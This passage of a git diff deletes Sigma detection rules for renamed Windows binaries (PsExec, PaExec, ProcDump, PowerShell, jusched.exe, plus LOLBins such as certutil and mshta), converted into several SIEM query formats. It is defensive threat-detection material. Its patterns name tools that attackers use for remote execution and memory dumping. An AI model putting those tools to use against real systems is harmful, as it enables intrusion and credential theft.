-((OriginalFileName="powershell.exe" OR OriginalFileName="powershell_ise.exe" OR OriginalFileName="psexec.exe" OR OriginalFileName="psexec.c" OR OriginalFileName="cscript.exe" OR OriginalFileName="wscript.exe" OR OriginalFileName="mshta.exe" OR OriginalFileName="regsvr32.exe" OR OriginalFileName="wmic.exe" OR OriginalFileName="certutil.exe" OR OriginalFileName="rundll32.exe" OR OriginalFileName="cmstp.exe" OR OriginalFileName="msiexec.exe") NOT ((Image="*\\powershell.exe" OR Image="*\\powershell_ise.exe" OR Image="*\\psexec.exe" OR Image="*\\psexec64.exe" OR Image="*\\cscript.exe" OR Image="*\\wscript.exe" OR Image="*\\mshta.exe" OR Image="*\\regsvr32.exe" OR Image="*\\wmic.exe" OR Image="*\\certutil.exe" OR Image="*\\rundll32.exe" OR Image="*\\cmstp.exe" OR Image="*\\msiexec.exe")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" OriginalFileName IN ["powershell.exe", "powershell_ise.exe", "psexec.exe", "psexec.c", "cscript.exe", "wscript.exe", "mshta.exe", "regsvr32.exe", "wmic.exe", "certutil.exe", "rundll32.exe", "cmstp.exe", "msiexec.exe"]  -(Image IN ["*\\powershell.exe", "*\\powershell_ise.exe", "*\\psexec.exe", "*\\psexec64.exe", "*\\cscript.exe", "*\\wscript.exe", "*\\mshta.exe", "*\\regsvr32.exe", "*\\wmic.exe", "*\\certutil.exe", "*\\rundll32.exe", "*\\cmstp.exe", "*\\msiexec.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*powershell\.exe|.*powershell_ise\.exe|.*psexec\.exe|.*psexec\.c|.*cscript\.exe|.*wscript\.exe|.*mshta\.exe|.*regsvr32\.exe|.*wmic\.exe|.*certutil\.exe|.*rundll32\.exe|.*cmstp\.exe|.*msiexec\.exe))(?=.*(?!.*(?:.*(?=.*(?:.*.*\powershell\.exe|.*.*\powershell_ise\.exe|.*.*\psexec\.exe|.*.*\psexec64\.exe|.*.*\cscript\.exe|.*.*\wscript\.exe|.*.*\mshta\.exe|.*.*\regsvr32\.exe|.*.*\wmic\.exe|.*.*\certutil\.exe|.*.*\rundll32\.exe|.*.*\cmstp\.exe|.*.*\msiexec\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_jusched.md b/Atomic_Threat_Coverage/Detection_Rules/win_renamed_jusched.md
deleted file mode 100644
index 192fae9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_jusched.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Renamed jusched.exe       |
-|:-------------------------|:------------------|
-| **Description**          | Detects renamed jusched.exe used by cobalt group |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>penetration tests, red teaming</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf](https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf)</li></ul>  |
-| **Author**               | Markus Neis, Swisscom |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Renamed jusched.exe 
-status: experimental
-id: edd8a48c-1b9f-4ba1-83aa-490338cd1ccb
-description: Detects renamed jusched.exe used by cobalt group 
-references:
-    - https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf
-tags:
-    - attack.t1036 
-    - attack.execution
-author: Markus Neis, Swisscom
-date: 2019/06/04
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Description: Java Update Scheduler
-    selection2:
-        Description: Java(TM) Update Scheduler
-    filter:
-        Image|endswith:
-            - '\jusched.exe'
-    condition: (selection1 or selection2) and not filter
-falsepositives:
-    - penetration tests, red teaming
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and (($_.ID -eq "1") -and ($_.message -match "Description.*Java Update Scheduler" -or $_.message -match "Description.*Java(TM) Update Scheduler")) -and  -not (($_.message -match "Image.*.*\\jusched.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Description:"Java\ Update\ Scheduler" OR winlog.event_data.Description:"Java\(TM\)\ Update\ Scheduler") AND (NOT (winlog.event_data.Image.keyword:(*\\jusched.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/edd8a48c-1b9f-4ba1-83aa-490338cd1ccb <<EOF
-{
-  "metadata": {
-    "title": "Renamed jusched.exe",
-    "description": "Detects renamed jusched.exe used by cobalt group",
-    "tags": [
-      "attack.t1036",
-      "attack.execution"
-    ],
-    "query": "((winlog.event_data.Description:\"Java\\ Update\\ Scheduler\" OR winlog.event_data.Description:\"Java\\(TM\\)\\ Update\\ Scheduler\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\jusched.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Description:\"Java\\ Update\\ Scheduler\" OR winlog.event_data.Description:\"Java\\(TM\\)\\ Update\\ Scheduler\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\jusched.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Renamed jusched.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Description:"Java Update Scheduler" OR Description:"Java\(TM\) Update Scheduler") AND (NOT (Image.keyword:(*\\jusched.exe))))
-```
-
-
-### splunk
-    
-```
-((Description="Java Update Scheduler" OR Description="Java(TM) Update Scheduler") NOT ((Image="*\\jusched.exe")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (event_id="1" (Description="Java Update Scheduler" OR Description="Java(TM) Update Scheduler"))  -(Image IN ["*\\jusched.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?:.*Java Update Scheduler|.*Java\(TM\) Update Scheduler)))(?=.*(?!.*(?:.*(?=.*(?:.*.*\jusched\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_paexec.md b/Atomic_Threat_Coverage/Detection_Rules/win_renamed_paexec.md
deleted file mode 100644
index 52b27a7..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_paexec.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | Execution of Renamed PaExec       |
-|:-------------------------|:------------------|
-| **Description**          | Detects execution of renamed paexec via imphash and executable product string |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown imphashes</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc](sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc)</li><li>[https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf](https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf)</li></ul>  |
-| **Author**               | Jason Lynch |
-| Other Tags           | <ul><li>FIN7</li><li>car.2013-05-009</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Execution of Renamed PaExec
-id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b
-status: experimental
-description: Detects execution of renamed paexec via imphash and executable product string
-references:
-    - sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc
-    - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-    - FIN7
-    - car.2013-05-009
-date: 2019/04/17
-author: Jason Lynch 
-falsepositives:
-    - Unknown imphashes
-level: medium
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Product:
-            - '*PAExec*'
-    selection2:
-        Imphash:
-            - 11D40A7B7876288F919AB819CC2D9802
-            - 6444f8a34e99b8f7d9647de66aabe516
-            - dfd6aa3f7b2b1035b76b718f1ddc689f
-            - 1a6cca4d5460b1710a12dea39e4a592c
-    filter1:
-        Image: '*paexec*'
-    condition: (selection1 and selection2) and not filter1
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.ID -eq "1" -and ($_.message -match "Product.*.*PAExec.*") -and ($_.message -match "11D40A7B7876288F919AB819CC2D9802" -or $_.message -match "6444f8a34e99b8f7d9647de66aabe516" -or $_.message -match "dfd6aa3f7b2b1035b76b718f1ddc689f" -or $_.message -match "1a6cca4d5460b1710a12dea39e4a592c")) -and  -not ($_.message -match "Image.*.*paexec.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((Product.keyword:(*PAExec*) AND winlog.event_data.Imphash:("11d40a7b7876288f919ab819cc2d9802" OR "11D40A7B7876288F919AB819CC2D9802" OR "6444f8a34e99b8f7d9647de66aabe516" OR "6444F8A34E99B8F7D9647DE66AABE516" OR "dfd6aa3f7b2b1035b76b718f1ddc689f" OR "DFD6AA3F7B2B1035B76B718F1DDC689F" OR "1a6cca4d5460b1710a12dea39e4a592c" OR "1A6CCA4D5460B1710A12DEA39E4A592C")) AND (NOT (winlog.event_data.Image.keyword:*paexec*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7b0666ad-3e38-4e3d-9bab-78b06de85f7b <<EOF
-{
-  "metadata": {
-    "title": "Execution of Renamed PaExec",
-    "description": "Detects execution of renamed paexec via imphash and executable product string",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036",
-      "FIN7",
-      "car.2013-05-009"
-    ],
-    "query": "((Product.keyword:(*PAExec*) AND winlog.event_data.Imphash:(\"11d40a7b7876288f919ab819cc2d9802\" OR \"11D40A7B7876288F919AB819CC2D9802\" OR \"6444f8a34e99b8f7d9647de66aabe516\" OR \"6444F8A34E99B8F7D9647DE66AABE516\" OR \"dfd6aa3f7b2b1035b76b718f1ddc689f\" OR \"DFD6AA3F7B2B1035B76B718F1DDC689F\" OR \"1a6cca4d5460b1710a12dea39e4a592c\" OR \"1A6CCA4D5460B1710A12DEA39E4A592C\")) AND (NOT (winlog.event_data.Image.keyword:*paexec*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((Product.keyword:(*PAExec*) AND winlog.event_data.Imphash:(\"11d40a7b7876288f919ab819cc2d9802\" OR \"11D40A7B7876288F919AB819CC2D9802\" OR \"6444f8a34e99b8f7d9647de66aabe516\" OR \"6444F8A34E99B8F7D9647DE66AABE516\" OR \"dfd6aa3f7b2b1035b76b718f1ddc689f\" OR \"DFD6AA3F7B2B1035B76B718F1DDC689F\" OR \"1a6cca4d5460b1710a12dea39e4a592c\" OR \"1A6CCA4D5460B1710A12DEA39E4A592C\")) AND (NOT (winlog.event_data.Image.keyword:*paexec*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Execution of Renamed PaExec'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Product.keyword:(*PAExec*) AND Imphash:("11d40a7b7876288f919ab819cc2d9802" "11D40A7B7876288F919AB819CC2D9802" "6444f8a34e99b8f7d9647de66aabe516" "6444F8A34E99B8F7D9647DE66AABE516" "dfd6aa3f7b2b1035b76b718f1ddc689f" "DFD6AA3F7B2B1035B76B718F1DDC689F" "1a6cca4d5460b1710a12dea39e4a592c" "1A6CCA4D5460B1710A12DEA39E4A592C")) AND (NOT (Image.keyword:*paexec*)))
-```
-
-
-### splunk
-    
-```
-(((Product="*PAExec*") (Imphash="11D40A7B7876288F919AB819CC2D9802" OR Imphash="6444f8a34e99b8f7d9647de66aabe516" OR Imphash="dfd6aa3f7b2b1035b76b718f1ddc689f" OR Imphash="1a6cca4d5460b1710a12dea39e4a592c")) NOT (Image="*paexec*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (event_id="1" Product IN ["*PAExec*"] Imphash IN ["11D40A7B7876288F919AB819CC2D9802", "6444f8a34e99b8f7d9647de66aabe516", "dfd6aa3f7b2b1035b76b718f1ddc689f", "1a6cca4d5460b1710a12dea39e4a592c"])  -(Image="*paexec*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?:.*.*PAExec.*))(?=.*(?:.*11D40A7B7876288F919AB819CC2D9802|.*6444f8a34e99b8f7d9647de66aabe516|.*dfd6aa3f7b2b1035b76b718f1ddc689f|.*1a6cca4d5460b1710a12dea39e4a592c))))(?=.*(?!.*(?:.*(?=.*.*paexec.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_powershell.md b/Atomic_Threat_Coverage/Detection_Rules/win_renamed_powershell.md
deleted file mode 100644
index 6c852c0..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_powershell.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Renamed PowerShell       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the execution of a renamed PowerShell often used by attackers or malware |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/christophetd/status/1164506034720952320](https://twitter.com/christophetd/status/1164506034720952320)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2013-05-009</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Renamed PowerShell
-id: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20
-status: experimental
-description: Detects the execution of a renamed PowerShell often used by attackers or malware
-references:
-    - https://twitter.com/christophetd/status/1164506034720952320
-author: Florian Roth
-date: 2019/08/22
-tags:
-    - car.2013-05-009
-logsource:
-    product: windows
-    category: process_creation
-detection:
-    selection:
-        Description: 'Windows PowerShell'
-        Company: 'Microsoft Corporation'
-    filter:
-        Image: 
-            - '*\powershell.exe'
-            - '*\powershell_ise.exe'
-    condition: selection and not filter
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Description.*Windows PowerShell" -and $_.message -match "Company.*Microsoft Corporation") -and  -not (($_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\powershell_ise.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Description:"Windows\ PowerShell" AND Company:"Microsoft\ Corporation") AND (NOT (winlog.event_data.Image.keyword:(*\\powershell.exe OR *\\powershell_ise.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20 <<EOF
-{
-  "metadata": {
-    "title": "Renamed PowerShell",
-    "description": "Detects the execution of a renamed PowerShell often used by attackers or malware",
-    "tags": [
-      "car.2013-05-009"
-    ],
-    "query": "((winlog.event_data.Description:\"Windows\\ PowerShell\" AND Company:\"Microsoft\\ Corporation\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\powershell.exe OR *\\\\powershell_ise.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Description:\"Windows\\ PowerShell\" AND Company:\"Microsoft\\ Corporation\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\powershell.exe OR *\\\\powershell_ise.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Renamed PowerShell'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Description:"Windows PowerShell" AND Company:"Microsoft Corporation") AND (NOT (Image.keyword:(*\\powershell.exe *\\powershell_ise.exe))))
-```
-
-
-### splunk
-    
-```
-((Description="Windows PowerShell" Company="Microsoft Corporation") NOT ((Image="*\\powershell.exe" OR Image="*\\powershell_ise.exe")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Description="Windows PowerShell" Company="Microsoft Corporation")  -(Image IN ["*\\powershell.exe", "*\\powershell_ise.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*Windows PowerShell)(?=.*Microsoft Corporation)))(?=.*(?!.*(?:.*(?=.*(?:.*.*\powershell\.exe|.*.*\powershell_ise\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_procdump.md b/Atomic_Threat_Coverage/Detection_Rules/win_renamed_procdump.md
deleted file mode 100644
index bdd22da..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_procdump.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Renamed ProcDump       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the execution of a renamed ProcDump executable often used by attackers or malware |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Procdump illegaly bundled with legitimate software</li><li>Weird admins who renamed binaries</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://docs.microsoft.com/en-us/sysinternals/downloads/procdump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Renamed ProcDump
-id: 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67
-status: experimental
-description: Detects the execution of a renamed ProcDump executable often used by attackers or malware
-references:
-    - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
-author: Florian Roth
-date: 2019/11/18
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-logsource:
-    product: windows
-    category: process_creation
-detection:
-    selection:
-        OriginalFileName: 'procdump'
-    filter:
-        Image: 
-            - '*\procdump.exe'
-            - '*\procdump64.exe'
-    condition: selection and not filter
-falsepositives:
-    - Procdump illegaly bundled with legitimate software
-    - Weird admins who renamed binaries
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "OriginalFileName.*procdump" -and  -not (($_.message -match "Image.*.*\\procdump.exe" -or $_.message -match "Image.*.*\\procdump64.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(OriginalFileName:"procdump" AND (NOT (winlog.event_data.Image.keyword:(*\\procdump.exe OR *\\procdump64.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67 <<EOF
-{
-  "metadata": {
-    "title": "Renamed ProcDump",
-    "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "(OriginalFileName:\"procdump\" AND (NOT (winlog.event_data.Image.keyword:(*\\\\procdump.exe OR *\\\\procdump64.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(OriginalFileName:\"procdump\" AND (NOT (winlog.event_data.Image.keyword:(*\\\\procdump.exe OR *\\\\procdump64.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Renamed ProcDump'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(OriginalFileName:"procdump" AND (NOT (Image.keyword:(*\\procdump.exe *\\procdump64.exe))))
-```
-
-
-### splunk
-    
-```
-(OriginalFileName="procdump" NOT ((Image="*\\procdump.exe" OR Image="*\\procdump64.exe")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" OriginalFileName="procdump"  -(Image IN ["*\\procdump.exe", "*\\procdump64.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*procdump)(?=.*(?!.*(?:.*(?=.*(?:.*.*\procdump\.exe|.*.*\procdump64\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_psexec.md b/Atomic_Threat_Coverage/Detection_Rules/win_renamed_psexec.md
deleted file mode 100644
index db6837a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_psexec.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Renamed PsExec       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the execution of a renamed PsExec often used by attackers or malware |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Software that illegaly integrates PsExec in a renamed form</li><li>Administrators that have renamed PsExec and no one knows why</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks](https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2013-05-009</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Renamed PsExec
-id: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2
-status: experimental
-description: Detects the execution of a renamed PsExec often used by attackers or malware
-references:
-    - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks
-author: Florian Roth
-date: 2019/05/21
-tags:
-    - car.2013-05-009
-logsource:
-    product: windows
-    category: process_creation
-detection:
-    selection:
-        Description: 'Execute processes remotely'
-        Product: 'Sysinternals PsExec'
-    filter:
-        Image:
-           - '*\PsExec.exe'
-           - '*\PsExec64.exe'
-    condition: selection and not filter
-falsepositives:
-    - Software that illegaly integrates PsExec in a renamed form
-    - Administrators that have renamed PsExec and no one knows why
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Description.*Execute processes remotely" -and $_.message -match "Product.*Sysinternals PsExec") -and  -not (($_.message -match "Image.*.*\\PsExec.exe" -or $_.message -match "Image.*.*\\PsExec64.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Description:"Execute\ processes\ remotely" AND Product:"Sysinternals\ PsExec") AND (NOT (winlog.event_data.Image.keyword:(*\\PsExec.exe OR *\\PsExec64.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2 <<EOF
-{
-  "metadata": {
-    "title": "Renamed PsExec",
-    "description": "Detects the execution of a renamed PsExec often used by attackers or malware",
-    "tags": [
-      "car.2013-05-009"
-    ],
-    "query": "((winlog.event_data.Description:\"Execute\\ processes\\ remotely\" AND Product:\"Sysinternals\\ PsExec\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\PsExec.exe OR *\\\\PsExec64.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
